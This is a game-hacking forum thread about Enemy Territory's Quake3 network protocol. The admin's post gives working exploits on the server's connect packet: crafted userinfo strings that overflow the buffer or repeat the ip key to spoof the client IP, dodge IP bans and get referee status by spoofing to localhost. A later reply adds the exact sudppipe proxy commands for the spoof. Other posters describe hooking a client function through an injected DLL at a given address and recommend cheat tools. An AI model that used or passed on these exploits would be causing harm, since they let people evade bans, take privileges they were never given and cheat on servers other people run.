OOB IP Spoofing exploits: Referee hack & Unban

General
Log in to reply
  • Annihil
    admin

    Enemy Territory uses the Quake3 network protocol.

    When you connect to a server, the communication is initialized by an OOB (Out of Band) message, which format is:

    ����connect "<userinfo>"

    The ���� is the packet header, it is equal to 0xFF 0xFF 0xFF 0xFF and is used to identify the packet type.

    connect is the command intended.

    The userinfo is a key-value string which format is \key\value.

    The userinfo contains

    • g_password: the server password
    • cl_guid: the etkey
    • cl_wwwDownload: whether the client allow pk3 download
    • name: the player name
    • rate: the packet transfer rate
    • snaps: the ping adjustement ?
    • cl_punkbuster: whether punkbuster is enabled
    • protocol: the protocol version, here 84
    • qport: the client port used
    • challenge: a random number ?

    The raw line looks like this:

    ����connect "\g_password\none\cl_guid\CE0C2139D870D721E895A39BB06500C6\cl_wwwDownload\1\name\ETPlayer\rate\25000\snaps\20\cl_anonymous\0\cl_punkbuster\1\protocol\84\qport\738\challenge\385942564"

    Now, when the server receive the connect query message, it appends another value at the end of your userinfo, your IP

    ����connect "\g_password\none\cl_guid\CE0C2139D870D721E895A39BB06500C6\cl_wwwDownload\1\name\ETPlayer\rate\25000\snaps\20\cl_anonymous\0\cl_punkbuster\1\protocol\84\qport\738\challenge\385942564\ip\216.3.128.12:60252"

    There is two ways to alter this value

    Buffer Overflow

    The <userinfo> is a char array of size 1024

    #define MAX_INFO_STRING 1024

    and thought of adding a long key-value of (1024 - the current <userinfo>) length char at the end of the sent userinfo.

    It looks like this

    ����connect "\g_password\none\cl_guid\CE0C2139D870D721E895A39BB06500C6\cl_wwwDownload\1\name\ETPlayer\rate\25000\snaps\20\cl_anonymous\0\cl_punkbuster\1\protocol\84\qport\738\challenge\385942564\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

    So, here, my <userinfo> followed by \421 × A\420 × A

    When the server receive that, it will add you IP after your userinfo, but as it's stored in a char[1024] variable, a buffer overflow occurs and your IP is discarded.

    The server does not know your current IP anymore, and if you were IP banned, now you're not.

    Duplicate field exploit

    If the server receive the same key in the userinfo string, it will remove the last duplicated key.

    Inserting

    \ip\216.3.128.12:60252\ip\216.3.128.12:60252

    after the name key (for example) will make the server remove the last ip key, which is your real ip, keeping the one you inserted in your fake userinfo.

    The raw line would looks like that

    ����connect "\g_password\none\cl_guid\CE0C2139D870D721E895A39BB06500C6\cl_wwwDownload\1\ip\locahost\ip\localhost\name\ETPlayer\rate\25000\snaps\20\cl_anonymous\0\cl_punkbuster\1\protocol\84\qport\693\challenge\385942564"

    This method makes it possible to spoof IP.

    Now, another exploit can be used with IP spoofing.

    Referee hack

    Instead of spoofing the IP to a random IP like 216.3.128.12, spoofing it to localhost will automatically promote the player to Referee status.

    0
  • D

    Does it still work?

    Annihil 1 Reply 0
  • Annihil
    admin

    @DrWindows On some servers yes

    0
  • D

    I dont get how it works? Can u explain that ref hack?`

    Annihil 1 Reply 0
  • Annihil
    admin

    You can use Simple UDP proxy/pipe 0.4.1 (sudppipe) with Quake 3 engine "connect" modifier 0.2 (q3conmod_sudp) (compatible with Enemy Territory as it uses quake3 network protocol)

    plugin for sudppipe which allows a simple customization of the "connect" packet for the games which use the Quake 3 engine:
    sudppipe -l q3conmod_sudp.dll -L "\parameter1\value1\parameter2\value2" IP PORT 1234
    (use -L "" for the runtime help) then from the console of the game type: /connect 127.0.0.1:1234
    the following is an example for joining a server which uses PunkBuster with PB disabled (the client will be kicked after some seconds/minutes):
    sudppipe -l q3conmod_sudp.dll -L "\cl_punkbuster\1" SERVER PORT 1234
    then from the client:
    /pb_cl_disable
    /connect 127.0.0.1:1234

    So to spoof your IP address, you can use
    sudppipe -l q3conmod_sudp.dll -L "\ip\216.3.128.12:60252\ip\216.3.128.12:60252" SERVER PORT 1234
    Then, ingame, /connect 127.0.0.1 1234

    D 1 Reply 0
  • D

    @Annihil I dont get anything xD where do i need to type that?

    Annihil 1 Reply 0
  • Annihil
    admin

    @DrWindows In the Windows Command Prompt (cmd)

    0
  • D

    Its really confusing.

    Can u write a tutorial with like.
    1st u do this
    2nd this etc?

    0
  • S

    Hello!
    You do not know why it causes a cmd failure? I do everything according to your guide.
    Bat File:
    https://imgur.com/GMbzy40
    (4 is port)
    Connecting to server:
    https://i.imgur.com/HGHHjTT.jpg
    https://i.imgur.com/EZ94RS4.jpg
    https://i.imgur.com/vJh1ebI.jpg

    0

  • Or we could just prevent the pk3 from applying custom shit to ET

    read more
  • A

    yeah just develop a .dll with function hooking on CL_InitDownloads that does nothing and inject it while using some cheat that allow unpure .pk3 and you will bypass download of custom shit but also maps so make sure you already have em...

    this is the address of the function on 2.60b 0x428AD0

    read more

  • Well I may have some ideas on how to solve your problems but it seems you are very new to linux...
    I wouldn't recommend starting by compiling ETH if you don't have any knowledge about that OS, AFAIK eth-1.4-archit3ct-b3 does not compile on Ubuntu 64 bits (libghf which depends on libelf, libbfd and libopcodes will cause you headaches). That is why I started modifying it till it was so different that it eventually became eth-annihilation, which I later ported to Windows since nobody were playing ET on linux anymore, so I haven't touched Linux since 2017, I would have hard time helping you if I'm honest.
    That said, eth-1.4-archit3ct-b3 is fairly old and outdated, you wouldn't be able to play on any mods nowadays except etpro and perhaps etpub. If you still really want to do that, look at sETH32nix, eth32nix salvation or resurrection which are the best hacks for raging ever made for ET.

    read more

  • Well so first of all ETLegacy is a game and a mod, you don't need ETL to play on servers running Legacy mod. The benefits of ETL, on the top of my head, is that it works on much more devices than 2.60b, for example Mac OS X Catalina, Linux 64 bits, Raspberry Pi, Android and even PS Vita.
    It also fixes the pain points of ET with built-in minimizer, auto desktop resolution, etkey generator.
    Now, if you are using Windows 10, ETL will not give you any substantial benefits over 260b if you are using Nexus. I have benchmarked ETL 277 and ET 260b, and 260b gives me higher framerate, which matters if you are using Nexus. You can use ETWC to mininize ET, I added an etkey generator in Nexus, and it is very easy to use a custom resolution with cvars on 260b. Also ETL does not support ETPro / Punkbuster.
    Nexus does not support ETL, but Legacy mod via 260b.

    read more